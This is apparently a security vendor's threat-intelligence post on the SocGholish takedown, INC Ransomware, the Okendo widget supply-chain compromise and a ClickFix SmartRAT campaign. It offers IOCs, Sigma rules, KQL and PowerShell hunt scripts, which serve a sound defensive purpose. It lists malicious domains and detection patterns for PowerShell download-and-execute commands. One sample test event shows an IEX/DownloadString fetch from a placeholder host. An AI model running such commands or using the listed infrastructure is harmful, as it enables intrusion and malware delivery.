
SocGholish Takedown, INC Ransomware Evolution & Supply Chain Injection: OTX Pulse Intelligence

Security Arsenal Team
June 19, 2026
7 min read

Recent OTX pulses indicate a significant shift in the threat landscape, characterized by the disruption of a major malware loader operation and the rapid evolution of emerging ransomware and supply chain threats.

  • Operation Endgame: A multinational law enforcement effort has successfully dismantled the infrastructure supporting SocGholish, a pervasive malware framework utilized by TA569 (GOLD PRELUDE) since 2017. This operation resulted in the seizure of 106 servers and the remediation of approximately 15,000 compromised WordPress sites that were being used as initial access vectors, primarily via fake browser update prompts.

  • Rising RaaS: With the disruption of major cartels like LockBit, INC Ransomware has aggressively expanded, rebranding and rewriting its encryptors in Rust to target both Windows and Linux/ESXi platforms. Their affiliate model now heavily leverages vulnerabilities like CVE-2025-5777 and CVE-2024-57727 for initial access.

  • Supply Chain & AI-Driven Attacks: A new wave of sophisticated attacks is exploiting trusted third-party components and AI-generated content. Threat actors have compromised the Okendo Reviews widget, injecting malicious JavaScript into over 18,000 e-commerce sites to deliver RATs like NetSupport and Sectop RAT. Separately, an AI-generated ClickFix campaign is targeting the Brazilian financial sector, using typosquatted domains and fake CAPTCHAs to distribute SmartRAT.

  • Infostealer Proliferation: Infostealers such as ACRStealer, LummaC2, and AgentTesla continue to see widespread distribution, primarily through cracked software hosting on platforms like Mediafire and AWS S3 buckets.

Threat Actor / Malware Profile

  • GOLD PRELUDE (TA569): The primary actor behind the now-disrupted SocGholish framework. Its main method involved compromising WordPress sites to serve fake browser update prompts that led to the download of malicious JScript payloads. The loader was a major distributor for malware families including IcedID, Pikabot, and QakBot. Although the infrastructure has been seized, affiliates may pivot to other loaders.

  • INC Ransomware: A top-tier Ransomware-as-a-Service (RaaS) operation that has evolved significantly. Its new Rust-based encryptors allow for cross-platform attacks. The group employs a double-extortion model and is actively exploiting vulnerabilities, such as the CVE-2025-5777 series, to gain initial access. Their post-exploitation toolkit includes Cobalt Strike and custom tools like Lynx and Sinobi.

  • SmartApeSG: The threat actor behind the Okendo Reviews supply chain attack. By injecting malicious code into a legitimate JavaScript widget, they can stage and deliver payloads, including NetSupport, Remcos, and SmartRAT, directly to victims' browsers without any further user interaction on the e-commerce site.

  • SmartRAT: A PowerShell-based banking trojan and RAT delivered in the AI-driven ClickFix campaign. It features encrypted C2 communication, QR code interception, and data stealing capabilities. Its delivery relies on social engineering (fake CAPTCHA/BSOD) to trick users into executing PowerShell commands.

IOC Analysis

The provided IOCs are varied and require a multi-layered defensive approach:

  • Domains & Hostnames: A large number of hostnames (e.g., trademark.iglesiaelarca.com) and domains (e.g., crefisa.online, incblog.su) are associated with C2 infrastructure, payload staging, and typosquatting. These should be blocked at the DNS and network perimeter.

  • File Hashes: Multiple MD5, SHA1, and SHA256 hashes are provided for payloads, including ransomware samples and droppers. These are critical for EDR and AV solutions to block file execution and scan for artifacts on disk.

  • URLs: Specific URLs point to malicious infrastructure for the Okendo compromise (api.wiggett...com) and the malicious JavaScript file itself (cdn-static.okendo.io...). Blocking these URLs is essential to prevent the initial payload fetch.

  • CVEs: While not direct IOCs, the listed CVEs (e.g., CVE-2025-5777) should be prioritized for patching as they are identified initial access vectors for INC Ransomware.

SOC teams should immediately ingest these IOCs into their SIEM and EDR platforms. The domains and URLs should be blocked via network proxy and DNS sinkholing. File hashes can be used for YARA rule creation and retrospective hunting for potential breaches.

Detection Engineering

Sigma Rules

---
title: Potential SocGholish Fake Browser Update
description: Detects potential execution of malicious JScript files delivered via fake browser update prompts, often associated with SocGholish and TA569.
author: Security Arsenal
date: 2026/06/20
references:
  - https://www.infoblox.com/blog/threat-intelligence/hot-take-operation-endgame-vs-socgholish/
tags:
  - attack.execution
  - attack.t1059.005
  - attack.t1204.002
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\wscript.exe'
      - '\cscript.exe'
  selection_cli:
    CommandLine|contains:
      - 'update'
      - 'chrome'
      - 'firefox'
      - 'edge'
  selection_ext:
    CommandLine|contains:
      - '.js'
      - '.jse'
  condition: all of selection_*
falsepositives:
  - Legitimate system administration scripts
level: high
---
title: Suspicious PowerShell Execution Associated with ClickFix/SmartRAT
description: Detects PowerShell commands often used in ClickFix campaigns, including encoded commands and those mimicking system errors or updates.
author: Security Arsenal
date: 2026/06/20
references:
  - https://www.zscaler.com/blogs/security-research/clickfix-campaign-generated-ai-delivers-smartrat
tags:
  - attack.execution
  - attack.t1059.001
  - attack.initial_access
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\powershell.exe'
  selection_cli:
    CommandLine|contains:
      - 'FromBase64String'
      - 'IEX'
      - 'Invoke-Expression'
      - 'DownloadString'
  selection_keywords:
    CommandLine|contains:
      - 'captcha'
      - 'bsod'
      - 'update'
  condition: all of selection_*
falsepositives:
  - Legitimate administrative scripts
level: high
---
title: Potential Supply Chain Compromise via Okendo Widget
description: Detects network connections to suspicious domains associated with the Okendo Reviews supply chain attack.
author: Security Arsenal
date: 2026/06/20
references:
  - https://www.zscaler.com/blogs/security-research/smartapesg-launches-okendo-reviews-supply-chain-attack
tags:
  - attack.command_and_control
  - attack.t1071.001
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationHostname|contains:
      - 'wiggett'
      - 'wizzleticks'
  condition: selection
falsepositives:
  - None
level: critical
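To confirm that these rules fire on what they are meant to catch and stay quiet on benign administrative scripts, here is an added example (not from the original post, and not pySigma) that applies the three rules' selections and conditions, using Sigma's case-insensitive endswith/contains semantics, to constructed Sysmon-style events; every hostname and path in the sample events is a placeholder.

```python
# Rules transcribed from the Sigma documents above; list values are OR, fields within one selection AND.
SOCGHOLISH = {
    "selection_img": {"Image|endswith": ["\\wscript.exe", "\\cscript.exe"]},
    "selection_cli": {"CommandLine|contains": ["update", "chrome", "firefox", "edge"]},
    "selection_ext": {"CommandLine|contains": [".js", ".jse"]},
    "condition": "all of selection_*",
}
CLICKFIX = {
    "selection_img": {"Image|endswith": ["\\powershell.exe"]},
    "selection_cli": {"CommandLine|contains": ["FromBase64String", "IEX", "Invoke-Expression", "DownloadString"]},
    "selection_keywords": {"CommandLine|contains": ["captcha", "bsod", "update"]},
    "condition": "all of selection_*",
}
OKENDO = {
    "selection": {"DestinationHostname|contains": ["wiggett", "wizzleticks"]},
    "condition": "selection",
}
RULES = {"socgholish": SOCGHOLISH, "clickfix": CLICKFIX, "okendo": OKENDO}

def _match_field(event, spec, values):
    """Sigma field matching: 'Field|modifier' against a list of values, case-insensitive."""
    field, _, modifier = spec.partition("|")
    actual = str(event.get(field, "")).lower()
    for v in (x.lower() for x in values):
        if ((modifier == "endswith" and actual.endswith(v))
                or (modifier == "contains" and v in actual)
                or (modifier == "" and actual == v)):
            return True
    return False

def evaluate(rule, event):
    """Return True when the event satisfies the rule's condition ('all of selection_*' or one selection)."""
    selections = {k: v for k, v in rule.items() if k != "condition"}
    def hit(sel):
        return all(_match_field(event, spec, vals) for spec, vals in sel.items())
    cond = rule["condition"]
    if cond.startswith("all of "):
        prefix = cond[len("all of "):].rstrip("*")
        return all(hit(s) for name, s in selections.items() if name.startswith(prefix))
    return hit(selections[cond])

def hunt(events):
    """Return (rule name, event index) pairs for every rule that fires."""
    return [(name, i) for i, e in enumerate(events) for name, r in RULES.items() if evaluate(r, e)]

# Constructed sample events (not real telemetry); .invalid/.example names are reserved placeholders.
EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "CommandLine": r'wscript.exe "C:\Users\u\Downloads\Chrome_Update.js"'},
    {"Image": r"C:\Windows\System32\cscript.exe", "CommandLine": r"cscript.exe C:\Admin\inventory.js"},  # benign admin script
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -Command \"IEX (DownloadString 'http://captcha.invalid/v')\""},
    {"DestinationHostname": "api.wiggett.example"},
    {"DestinationHostname": "cdn-static.okendo.io"},  # the vendor's own CDN does not match this rule
]
```

The benign cscript event shows why `all of selection_*` matters: it satisfies the image and extension selections but not the update/browser keyword selection, so the SocGholish rule stays silent.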

KQL Hunt Query (Microsoft Sentinel)

// Hunt for potential C2 communication and malicious downloads associated with the provided IOCs.
// Note: okendo.io is the vendor's legitimate CDN, so hits on it need triage against the specific
// malicious script path rather than blanket blocking.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (
    "iglesiaelarca.com", "garretttrails.org", "summat10n.org",
    "roofnrack.us", "asurans.com", "beautysupplysalonllc.com",
    "okendo.io", "wiggett", "wizzleticks",
    "crefisa.online", "windowsupdate-cdn.com",
    "incblog.su", "comples.biz", "dafkov.shop"
)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, ActionType
// Append executions of known-bad hashes; union (outer by default) keeps both tables' column sets.
// The pipe before union is required, otherwise the editor treats this as a separate query.
| union (
    DeviceProcessEvents
    | where Timestamp > ago(7d)
    | where SHA256 in (
        "46e32500cd24395dd140293758e72fe8671217f5f5b0307858fc118a125aab8c",
        "6cd349eda0fa6c8b274a0920852c68f8b727afea1fdbc69ad183cef05d9cf141"
    )
    or MD5 in (
        "297eb45f028d44d750297d2f932b9c91", "3c72e1f37f115b00c3ad6ed31bacfe8a",
        "6bf4d4c62b5138ace281ce3d08297787", "b17ccdb5531555e43f082d6e77c07227",
        "0d1f6685b4e284f92ef25c0f935b8cdc"
    )
    | project Timestamp, DeviceName, AccountName, ProcessCommandLine, FolderPath, SHA256, MD5
)

PowerShell Hunt Script

<#
.SYNOPSIS
    Hunt script for IOCs related to SocGholish, INC Ransomware, and SmartRAT.
.DESCRIPTION
    This script checks the local system for the presence of suspicious files, processes, and registry keys.
    Run from an elevated session; the full-volume hash scan can take a long time on large disks.
.NOTES
    Author: Security Arsenal
    Date: 2026-06-20
#>

# Define file hashes to search for
$SuspiciousSHA256 = @(
    "46e32500cd24395dd140293758e72fe8671217f5f5b0307858fc118a125aab8c",
    "6cd349eda0fa6c8b274a0920852c68f8b727afea1fdbc69ad183cef05d9cf141"
)
$SuspiciousMD5 = @(
    "297eb45f028d44d750297d2f932b9c91", "3c72e1f37f115b00c3ad6ed31bacfe8a",
    "6bf4d4c62b5138ace281ce3d08297787", "b17ccdb5531555e43f082d6e77c07227",
    "0d1f6685b4e284f92ef25c0f935b8cdc"
)

# Scan for files matching the hashes (-File skips directories, -Force includes hidden files)
Write-Host "Scanning for suspicious files..."
Get-ChildItem -Path C:\ -Recurse -File -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 0 } |
    Where-Object {
        # -LiteralPath prevents wildcard expansion on file names containing [ ] characters;
        # the MD5 hash is only computed when the SHA256 did not already match
        $Sha256 = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        ($Sha256 -in $SuspiciousSHA256) -or
        ((Get-FileHash -LiteralPath $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash -in $SuspiciousMD5)
    } | Select-Object FullName, LastWriteTime | Format-Table -AutoSize

# Scan for suspicious process command lines (Get-CimInstance replaces the deprecated Get-WmiObject)
Write-Host "Checking for suspicious processes..."
Get-CimInstance -ClassName Win32_Process | Where-Object {
    $_.CommandLine -match 'FromBase64String' -or
    $_.CommandLine -match '\bIEX\b' -or
    $_.CommandLine -match 'wiggett' -or
    $_.CommandLine -match 'wizzleticks'
} | Select-Object Name, ProcessId, CommandLine | Format-Table -AutoSize

# Check for suspicious persistence mechanisms (Registry)
Write-Host "Checking for suspicious registry entries..."
$Paths = @(
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
)

foreach ($Path in $Paths) {
    if (Test-Path $Path) {
        $Values = Get-ItemProperty -Path $Path
        foreach ($Name in (Get-Item -Path $Path).Property) {
            $PropValue = $Values.$Name
            # Escaped dot: match a literal .js/.jse extension rather than any character followed by "js"
            if ($PropValue -match '\.jse?\b' -or $PropValue -match 'powershell.*IEX') {
                # ${Path}: is required here; "$Path:" would be parsed as a scoped variable reference
                Write-Host "Suspicious registry entry found in ${Path}:"
                Write-Host "Name: $Name - Value: $PropValue"
            }
        }
    }
}
Write-Host "Hunt script execution complete."

Response Priorities

  • Immediate:
    • Block all domains and URLs listed in the IOC Analysis section at your network perimeter, proxy, and DNS servers.
    • Scan your entire environment for the provided file hashes.
    • For e-commerce businesses, urgently inspect any Okendo Reviews widgets and apply vendor patches or mitigations immediately.
  • 24 Hours:
    • Hunt for and investigate any instances of PowerShell execution matching the ClickFix patterns on workstations, especially in finance departments or with ties to Brazil.
    • Initiate credential resets and identity verification for any accounts on systems flagged with potential infostealer activity.
  • 1 Week:
    • Patch all systems against the CVEs listed in the Threat Summary (e.g., CVE-2025-5777, CVE-2024-57727, CVE-2023-3519).
    • Conduct a review of supply chain security, focusing on the integrity of third-party web scripts and widgets.
    • Enhance endpoint detection rules to catch behaviors associated with fake browser updates and suspicious PowerShell activity.
